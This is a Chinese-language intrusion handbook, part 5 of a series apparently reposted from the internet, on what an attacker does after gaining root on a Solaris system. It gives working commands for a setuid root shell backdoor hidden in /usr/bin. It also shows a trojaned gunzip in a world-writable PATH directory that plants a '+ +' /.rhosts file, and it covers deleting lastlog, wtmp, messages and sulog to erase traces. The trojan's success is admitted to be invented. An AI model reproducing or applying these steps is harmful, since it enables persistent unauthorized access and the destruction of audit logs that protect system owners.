網絡入侵實用戰術手冊alpha (5)

網絡入侵實用戰術手冊alpha (5)轉自INTERNET

五、最後的瘋狂（善後）
1) 後門
e.g.有一次，俺通過改寫/.rhosts成了root，但.rhosts很容易被發現的哦，怎麼
辦？留個後門的說：
# rm -f /.rhosts
# cd /usr/bin
# ls mscl
mscl: 無此文件或目錄
# cp /bin/ksh mscl
# chmod a+s mscl
# ls -l mscl
-r-sr-sr-x 1 root ofc 192764 5月 19 11:42 mscl
以後以任何用戶登錄，只要執行``/usr/bin/mscl''就成root了。
/usr/bin下面那一大堆程序，能發現這個mscl的幾率簡直小到可以忽略不計了。

2) 特洛伊木馬
e.g. 有一次我發現：
$ echo $PATH
/usr/sbin:/usr/bin:/usr/ccs/bin:/opt/gnu/bin:.
$ ls -ld /opt/gnu
drwxrwxrwx 7 root other 512 5月 14 11:54 /opt/gnu
$ cd /opt/gnu
$ ls -l
total 24
drwxrwxrwx 7 root other 512 5月 14 11:54 .
drwxrwxr-x 9 root sys 512 5月 19 15:37 ..
drwxr-xr-x 2 root other 1536 5月 14 16:10 bin
drwxr-xr-x 3 root other 512 1996 11月 29 include
drwxr-xr-x 2 root other 3584 1996 11月 29 info
drwxr-xr-x 4 root other 512 1997 12月 17 lib
$ cp -R bin .TT_RT; cd .TT_RT
``.TT_RT''這種東東看起來像是系統的...
決定替換常用的程序gunzip
$ mv gunzip gunzip:
$ cat > toxan
#!/bin/sh
echo "+ +" >/.rhosts
^D
$ cat > gunzip
if [ -f /.rhosts ] then
mv /opt/gnu/bin /opt/gnu/.TT_RT
mv /opt/gnu/.TT_DB /opt/gnu/bin
/opt/gnu/bin/gunzip $*
else
/opt/gnu/bin/gunzip: $*
fi
^D
$ chmod 755 toxan gunzip
$ cd ..
$ mv bin .TT_DB
$ mv .TT_RT bin
$ ls -l
total 16
drwxr-xr-x 2 zw staff 1536 5月 14 16:10 bin
drwxr-xr-x 3 root other 512 1996 11月 29 include
drwxr-xr-x 2 root other 3584 1996 11月 29 info
drwxr-xr-x 4 root other 512 1997 12月 17 lib
$ ls -al
total 24
drwxrwxrwx 7 root other 512 5月 14 11:54 .
drwxrwxr-x 9 root sys 512 5月 19 15:37 ..
drwxr-xr-x 2 root other 1536 1998 11月 2 .TT_DB
drwxr-xr-x 2 zw staff 1536 5月 14 16:10 bin
drwxr-xr-x 3 root other 512 1996 11月 29 include
drwxr-xr-x 2 root other 3584 1996 11月 29 info
drwxr-xr-x 4 root other 512 1997 12月 17 lib

雖然有點暴露的可能(bin的屬主竟然是zw!!!)，但也顧不得了。
盼著root盡快執行gunzip吧...
過了兩天：
$ cd /opt/gnu
$ ls -al
total 24
drwxrwxrwx 7 root other 512 5月 14 11:54 .
drwxrwxr-x 9 root sys 512 5月 19 15:37 ..
drwxr-xr-x 2 zw other 1536 1998 11月 2 .TT_RT
drwxr-xr-x 2 root staff 1536 5月 14 16:10 bin
drwxr-xr-x 3 root other 512 1996 11月 29 include
drwxr-xr-x 2 root other 3584 1996 11月 29 info
drwxr-xr-x 4 root other 512 1997 12月 17 lib
(samsa:bingo!!!有人運行俺的特洛伊木馬樂...)
$ ls -a /
(null) .exrc dev proc
. .fm devices reconfigure
.. .hotjava etc sbin
.Xauthority .netscape export tftpboot
.Xdefaults .profile home tmp
.ab_library .wastebasket lib var
......
$ cat /.rhosts
+ +
$
(samsa:下面就不用 囉嗦了吧？）
註：該結果為samsa杜撰，那個特洛伊木馬至今還在老地方靜悄悄地呆著呢，即無人發
現也沒人光顧！！——已經20多年過去了耶....

3) 毀屍滅跡
消除掉登錄記錄：
3.1) /var/adm/lastlog
# cd /var/adm
# ls -l
總數73258
-rw------- 1 uucp bin 0 1998 10月 9 aculog
-r--r--r-- 1 root root 28168 5月 19 16:39 lastlog
drwxrwxr-x 2 adm adm 512 1998 10月 9 log
-rw-r--r-- 1 root root 30171962 5月 19 16:40 messages
drwxrwxr-x 2 adm adm 512 1998 10月 9 passwd
-rw-rw-rw- 1 bin bin 0 1998 10月 9 spellhist
-rw------- 1 root root 6871 5月 19 16:39 sulog
-rw-r--r-- 1 root bin 1188 5月 19 16:39 utmp
-rw-r--r-- 1 root bin 12276 5月 19 16:39 utmpx
-rw-rw-rw- 1 root root 122 1998 10月 9 vold.log
-rw-rw-r-- 1 adm adm 3343551 5月 19 16:39 wtmp
-rw-rw-r-- 1 adm adm 7229076 5月 19 16:39 wtmpx
為了下次登錄時不顯示``Last Login''信息（向真正的用戶顯示）：
# rm -f lastlog
# telnet victim.com
SunOS 5.7
login: zw
Password:
Sun Microsystems Inc. SunOS 5.7 Generic October 1998
$
(比較：
SunOS 5.7
login: zw
Password:
Last login: Wed May 19 16:38:31 from zw
Sun Microsystems Inc. SunOS 5.7 Generic October 1998
$
說明：/var/adm/lastlog 每次有用戶成功登錄進來時記一條，所以刪掉以後再
登錄一次就沒有``Last Login''信息，但再登一次又會出現，因為系統會自動
重新創建該文件）

3.2) /var/adm/utmp，/var/adm/utmpx /var/adm/wtmp，/var/adm/wtmpx
utmp、utmpx 這兩個數據庫文件存放當前登錄在本機上的用戶信息，用於who、
write、login等程序中；
$ who
wsj console 5月 19 16:49 (:0)
zw pts/5 5月 19 16:53 (zw)
yxun pts/3 5月 19 17:01 (192.168.0.115)
wtmp、wtmpx分別是它們的歷史記錄，用於``last''
命令，該命令讀取wtmp(x)的內容並以可理解的方式進行顯示:
$ last | grep zw
zw ftp 192.168.0.139 Fri Apr 30 09:47 - 10:12 (00:24)
zw pts/1 192.168.0.139 Fri Apr 30 08:05 - 11:40 (03:35)
zw pts/18 192.168.0.139 Thu Apr 29 15:36 - 16:50 (01:13)
zw pts/7 Thu Apr 29 09:53 - 15:35 (05:42)
zw pts/7 192.168.0.139 Thu Apr 29 08:48 - 09:53 (01:05)
zw ftp 192.168.0.139 Thu Apr 29 08:40 - 08:45 (00:04)
zw pts/10 192.168.0.139 Thu Apr 29 08:37 - 13:27 (04:49)
......
utmp、wtmp已經過時，現在實際使用的是utmpx和wtmpx，但同樣的信息依然以舊的
格式記錄在utmp和wtmp中，所以要刪就全刪。
# rm -f wtmp wtmpx
# last
/var/adm/wtmpx: 無此文件或目錄

3.3) syslog
syslogd 隨時從系統各處接受log請求，然後根據/etc/syslog.conf中的預先設定把
log信息寫入相應文件中、郵寄給特定用戶或者直接以消息的方式發往控制台。
不妨先看看syslog.conf的內容：
---------------------- begin: syslog.conf -------------------------------
#ident "@(#)syslog.conf 1.4 96/10/11 SMI" /* SunOS 5.0 */
#
# Copyright (c) 1991-1993, by Sun Microsystems, Inc.
#
# syslog configuration file.
#
*.err;kern.notice;auth.notice /dev/console
*.err;kern.debug;daemon.notice;mail.crit /var/adm/messages
*.alert;kern.err;daemon.err operator
*.alert root
......
---------------------- end : syslog.conf -------------------------------
``auth.notice''這樣的東東由兩部分組成，稱為``facility.level'',前者表示log
信息涉及的方面，level表示信息的緊急程度。
facility 有：user,kern,mail,daemon,auth,lpr,news,uucp,cron,etc...
level 有：emerg,alert,crit,err,warning,info,debug,etc...(緊急程度遞減)
一般和安全關係密切的facility是mail,daemon,auth etc...
而這類信息按慣例通常存放在/var/adm/messages裡。

那麼 messages 裡那些信息容易暴露「黑客」痕跡呢？
1，"May 4 08:48:35 numen login: REPEATED LOGIN FAILURES ON /dev/pts/9 FROM
sams
"
重複登錄失敗！如果你猜測口令的話，你肯定會經歷很多次這樣的失敗！
不過一般的UNIX系統只有一次telnet session連續登錄5次失敗才會記這麼一條，所以
當你4次嘗試還沒成功，最好趕緊退出，重新telnet...

2，"May 5 10:30:35 numen su: 'su root' failed for cxl on /dev/pts/15"
"May 18 17:02:16 numen su: 'su root' succeeded for zw on /dev/pts/1"
如果黑客想利用``su''成為超級用戶，無論成功失敗，messages裡都可能有記錄...

3，"Apr 29 10:12:23 numen sendmail[4777]: NOQUEUE: "wiz" command from numen"

"Apr 29 10:12:23 numen sendmail[4777]: NOQUEUE: "debug" command from nume
n"
Sendmail早期版本的``wiz''、``debug''命令是漏洞所在，所以黑客可能會嘗試這兩個 命令...
因此，/var/adm/messages也是暴露黑客行蹤的隱患，最好把它刪掉(如果能的話，哈哈
）！
?
# rm -f /var/adm/messages
(samsa:爽!!!)

或者，如果你不想引起注意的話，也可以只把對應的行刪掉（當然要有寫權限）。

3.4) sulog
/var/adm下還有一個sulog，是專門為su程序服務的：
# cat sulog
SU 05/06 09:05 + console root-zw
SU 05/06 13:55 - pts/9 yxun-root
SU 05/06 14:03 + pts/9 yxun-root
......
其中``+''表示su成功，``-''表示失堋Ｈ綣閿霉齭u，那就把這個文件也刪掉把，
或者把關於你的行刪掉!
--
DEADorALIVE